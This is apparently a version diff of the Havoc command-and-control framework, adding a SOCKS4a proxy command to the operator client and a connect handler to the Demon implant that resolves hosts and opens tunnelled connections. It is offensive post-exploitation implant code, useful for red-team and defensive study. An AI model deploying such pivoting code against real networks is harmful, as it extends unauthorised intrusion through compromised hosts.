Havoc Framework 0.4.1

Client/Source/Havoc/Demon/Commands.cpp

@@ -676,4 +676,39 @@ std::vector<DemonCommands::Command_t> DemonCommands::DemonCommandList = {
  },
  },
  },
+ {
+ .CommandString = "socks",
+ .Description = "socks4a proxy",
+ .Usage = "[sub command] (args)",
+ .Example = "add 4444",
+ .Module = true,
+
+ .SubCommands =
+ {
+ {
+ .CommandString = "add",
+ .Description = "add a socks4a proxy",
+ .Behavior = BEHAVIOR_API_ONLY,
+ .Usage = "[bind port]",
+ .Example = "4444",
+ },
+ {
+ .CommandString = "list",
+ .Description = "list all socks4a proxy servers",
+ .Behavior = BEHAVIOR_API_ONLY,
+ },
+ {
+ .CommandString = "kill",
+ .Description = "kill and remove a socks4a proxy server",
+ .Behavior = BEHAVIOR_API_ONLY,
+ .Usage = "[bind port]",
+ .Example = R"(4444)",
+ },
+ {
+ .CommandString = "clear",
+ .Description = "kill and clear all socks4a proxy servers",
+ .Behavior = BEHAVIOR_API_ONLY,
+ },
+ },
+ },
 };

Client/Source/Havoc/Demon/ConsoleInput.cpp

@@ -1219,6 +1219,60 @@ auto DemonCommands::DispatchCommand( bool Send, QString TaskID, const QString& c
  SEND( Execute.Socket( TaskID, "rportfwd clear", "" ) )
  }
 
+ }
+ else if ( InputCommands[ 0 ].compare( "socks" ) == 0 )
+ {
+ if ( InputCommands.size() <= 1 )
+ {
+ CONSOLE_ERROR( "Not enough arguments for \"socks\"" )
+ return false;
+ }
+
+ if ( InputCommands[ 1 ].compare( "add" ) == 0 )
+ {
+ auto Port = QString();
+
+ if ( InputCommands.size() < 3 )
+ {
+ CONSOLE_ERROR( "Not enough arguments for \"socks add\"" )
+ return false;
+ }
+
+ Port = InputCommands[ 2 ];
+ TaskID = Util::gen_random( 8 ).c_str();
+
+ CommandInputList[ TaskID ] = commandline;
+
+ SEND( Execute.Socket( TaskID, "socks add", Port ) )
+ }
+ else if ( InputCommands[ 1 ].compare( "list" ) == 0 )
+ {
+ TaskID = Util::gen_random( 8 ).c_str();
+ CommandInputList[ TaskID ] = commandline;
+
+ SEND( Execute.Socket( TaskID, "socks list", "" ) )
+ }
+ else if ( InputCommands[ 1 ].compare( "kill" ) == 0 )
+ {
+ if ( InputCommands.size() < 3 )
+ {
+ CONSOLE_ERROR( "Not enough arguments for \"socks kill\"" )
+ return false;
+ }
+
+ TaskID = Util::gen_random( 8 ).c_str();
+ CommandInputList[ TaskID ] = commandline;
+
+ SEND( Execute.Socket( TaskID, "socks kill", InputCommands[ 2 ] ) )
+ }
+ else if ( InputCommands[ 1 ].compare( "clear" ) == 0 )
+ {
+ TaskID = Util::gen_random( 8 ).c_str();
+ CommandInputList[ TaskID ] = commandline;
+
+ SEND( Execute.Socket( TaskID, "socks clear", "" ) )
+ }
+
  }
  else if ( InputCommands[ 0 ].compare( "transfer" ) == 0 )
  {

Client/Source/global.cpp

@@ -9,8 +9,8 @@ using namespace std;
 using namespace HavocNamespace;
 using namespace HavocNamespace::HavocSpace;
 
-string HavocNamespace::Version = "0.4";
-string HavocNamespace::CodeName = "Silver Chariot";
+string HavocNamespace::Version = "0.4.1";
+string HavocNamespace::CodeName = "The Fool";
 
 // Global Variables in the Havoc Namespace
 HavocSpace::Havoc* HavocNamespace::HavocApplication;

Teamserver/cmd/server.go

@@ -86,7 +86,7 @@ func serverFunc(cmd *cobra.Command, args []string) error {
  os.Exit(1)
  }
 
- logger.Info("Time: " + colors.Blue(ServerTimer.Format("02/01/2006 15:04:05")))
+ logger.Info("Time: " + colors.Yellow(ServerTimer.Format("02/01/2006 15:04:05")))
  logger.Info("Teamserver logs saved under: " + colors.Blue(LogrPath))
 
  teamserver.HavocTeamserver.Start()

Teamserver/cmd/version.go

@@ -1,6 +1,6 @@
 package cmd
 
 var (
- VersionNumber = "0.4"
- VersionName = "Silver Chariot"
+ VersionNumber = "0.4.1"
+ VersionName = "The Fool"
 )

Teamserver/data/implants/Demon/Include/Core/Download.h

@@ -23,16 +23,16 @@ typedef enum {
 typedef struct _DOWNLOAD_DATA
 {
  /* Some random ID so both teamserver and agent knows what file it is */
- DWORD  FileID;
+ DWORD FileID;
 
  /* file handle opened/created using CreateFile */
  HANDLE hFile;
 
  /* What we have left to read. */
- DWORD  Size;
+ DWORD Size;
 
  /* What we already read. */
- DWORD  ReadSize;
+ DWORD ReadSize;
 
  /* Current state of file transfer */
  DownloadState State;

Teamserver/data/implants/Demon/Include/Core/Socket.h

@@ -4,8 +4,8 @@
 #define SOCKET_TYPE_REVERSE_PORTFWD 0x1
 #define SOCKET_TYPE_REVERSE_PROXY 0x2 /* TODO: implement */
 #define SOCKET_TYPE_CLIENT 0x3
-#define SOCKET_TYPE_REMOVED  0x4 /* this is something we received from our operator */
-#define SOCKET_TYPE_DEAD  0x5 /* this is when a socket died, or we failed to read/write from/to it */
+#define SOCKET_TYPE_CLIENT_REMOVED 0x4 /* this is something we received from our operator */
+#define SOCKET_TYPE_SOCKS_REMOVED 0x5 /* this is when a socket died, or we failed to read/write from/to it */
 
 #define SOCKET_COMMAND_RPORTFWD_ADD 0x0
 #define SOCKET_COMMAND_RPORTFWD_ADDLCL 0x1
@@ -21,6 +21,7 @@
 #define SOCKET_COMMAND_OPEN 0x10
 #define SOCKET_COMMAND_READ_WRITE 0x11
 #define SOCKET_COMMAND_CLOSE 0x12
+#define SOCKET_COMMAND_CONNECT 0x13
 
 /* Errors */
 #define SOCKET_ERROR_ALREADY_BOUND 0x1
@@ -60,4 +61,11 @@ typedef struct _SOCKET_DATA
 PSOCKET_DATA SocketNew( SOCKET Socket, DWORD Type, DWORD LclAddr, DWORD LclPort, DWORD FwdAddr, DWORD FwdPort );
 
 /* Check for new connections, read everything from the sockets and or close "dead" sockets */
-VOID SocketPush();
+VOID SocketPush();
+
+/*!
+ * Query the IP from the specified domain
+ * @param Domain
+ * @return Ip address
+ */
+DWORD DnsQueryIP( LPSTR Domain );

Teamserver/data/implants/Demon/Include/Demon.h

@@ -5,6 +5,7 @@
 #include <winsock2.h>
 #include <ntstatus.h>
 #include <aclapi.h>
+#include <windns.h>
 
 #include <Common/Native.h>
 #include <Common/Macros.h>
@@ -94,9 +95,9 @@ typedef struct
 
  struct {
  BOOL Enabled;
- LPWSTR Url;
- LPWSTR Username;
- LPWSTR Password;
+ LPWSTR Url; /* TODO: Instead of using LPWSTR use BUFFER (to have the size of the string too) */
+ LPWSTR Username; /* TODO: Instead of using LPWSTR use BUFFER (to have the size of the string too) */
+ LPWSTR Password; /* TODO: Instead of using LPWSTR use BUFFER (to have the size of the string too) */
  } Proxy;
 #endif
 
@@ -341,7 +342,10 @@ typedef struct
  WIN_FUNC( closesocket )
  WIN_FUNC( recv )
  WIN_FUNC( send )
+ WIN_FUNC( connect )
 
+ /* dnsapi.dll */
+ WIN_FUNC( DnsQuery_A )
  } Win32;
 
  struct
@@ -398,6 +402,7 @@ typedef struct
  PVOID Wkscli;
  PVOID NetApi32;
  PVOID Ws2_32;
+ PVOID Dnsapi;
 
 #ifdef TRANSPORT_HTTP
  PVOID WinHttp;

Teamserver/data/implants/Demon/Source/Core/Command.c

@@ -794,7 +794,7 @@ VOID CommandFS( PPARSER Parser )
  PackageAddInt32( Package, Download->FileID );
 
  /* Download Open Data */
- PackageAddInt32( Package, FileSize );
+ PackageAddInt32( Package, FileSize ); /* TODO: change this to 64bit or else we can't download files larger than 4gb */
  if ( PathSize > 0 )
  PackageAddBytes( Package, FilePath, PathSize * sizeof( WCHAR ) );
  else
@@ -2618,7 +2618,7 @@ VOID CommandSocket( PPARSER Parser )
 
  if ( Socket->Type == SOCKET_TYPE_REVERSE_PORTFWD && Socket->ID == SocketID )
  {
- Socket->Type = SOCKET_TYPE_REMOVED;
+ Socket->Type = SOCKET_TYPE_CLIENT_REMOVED;
 
  /* we don't want to send the message now.
  * send it while we are free and closing the socket. */
@@ -2644,7 +2644,7 @@ VOID CommandSocket( PPARSER Parser )
  break;
 
  if ( Socket->Type == SOCKET_TYPE_REVERSE_PORTFWD )
- Socket->Type = SOCKET_TYPE_REMOVED;
+ Socket->Type = SOCKET_TYPE_CLIENT_REMOVED;
 
  Socket = Socket->Next;
  }
@@ -2660,6 +2660,7 @@ VOID CommandSocket( PPARSER Parser )
  case SOCKET_COMMAND_SOCKSPROXY_ADD: PUTS( "Socket::SocksProxyAdd" )
  {
  /* TODO: implement */
+
  break;
  }
 
@@ -2693,11 +2694,90 @@ VOID CommandSocket( PPARSER Parser )
 
  /* destroy the package and exit this command function */
  PackageDestroy( Package );
+
  return;
  }
 
  Socket = Socket->Next;
  }
+
+ break;
+ }
+
+ case SOCKET_COMMAND_CONNECT: PUTS( "Socket::Connect" )
+ {
+ DWORD ScId = 0;
+ LPSTR Host = NULL;
+ DWORD Addr = 0;
+ DWORD Port = 0;
+
+ /* parse arguments */
+ ScId = ParserGetInt32( Parser );
+ Port = ParserGetInt32( Parser );
+ Addr = ParserGetInt32( Parser );
+ Host = ParserGetBytes( Parser, NULL );
+
+ /* check if its 0.0.0.1
+ * if it's an addr then query for the host.
+ * if not the use the addr to connect */
+ if ( ( ( Addr >> ( 8 * 3 ) ) & 0xff ) == 0x00 &&
+ ( ( Addr >> ( 8 * 2 ) ) & 0xff ) == 0x00 &&
+ ( ( Addr >> ( 8 * 1 ) ) & 0xff ) == 0x00 &&
+ ( ( Addr >> ( 8 * 0 ) ) & 0xff ) == 0x1 )
+ {
+ /* query ip from specified host/domain */
+ Addr = DnsQueryIP( Host );
+ }
+
+ /* check if address is not 0 */
+ if ( Addr )
+ {
+ /* Create a socks proxy socket and insert it into the linked list. */
+ if ( ( Socket = SocketNew( NULL, SOCKET_TYPE_REVERSE_PROXY, HTONS32( Addr ), Port, 0, 0 ) ) )
+ Socket->ID = ScId;
+
+ PackageAddInt32( Package, Socket ? TRUE : FALSE );
+ }
+ else PackageAddInt32( Package, FALSE );
+
+ PackageAddInt32( Package, ScId );
+
+ break;
+ }
+
+ case SOCKET_COMMAND_CLOSE: PUTS( "Socket::Close" )
+ {
+ DWORD SocketID = 0;
+
+ /* parse arguments */
+ SocketID = ParserGetInt32( Parser );
+
+ /* get Sockets list */
+ Socket = Instance.Sockets;
+
+ for ( ;; )
+ {
+ if ( ! Socket )
+ break;
+
+ if ( Socket->ID == SocketID )
+ {
+ PRINTF( "Found socket: %x\n", Socket->ID )
+
+ Socket->Type = ( Socket->Type == SOCKET_TYPE_CLIENT ) ?
+ SOCKET_TYPE_CLIENT_REMOVED :
+ SOCKET_TYPE_SOCKS_REMOVED ;
+
+ /* destroy the package and exit this command function */
+ PackageDestroy( Package );
+
+ return;
+ }
+
+ Socket = Socket->Next;
+ }
+
+ break;
  }
 
  default: break;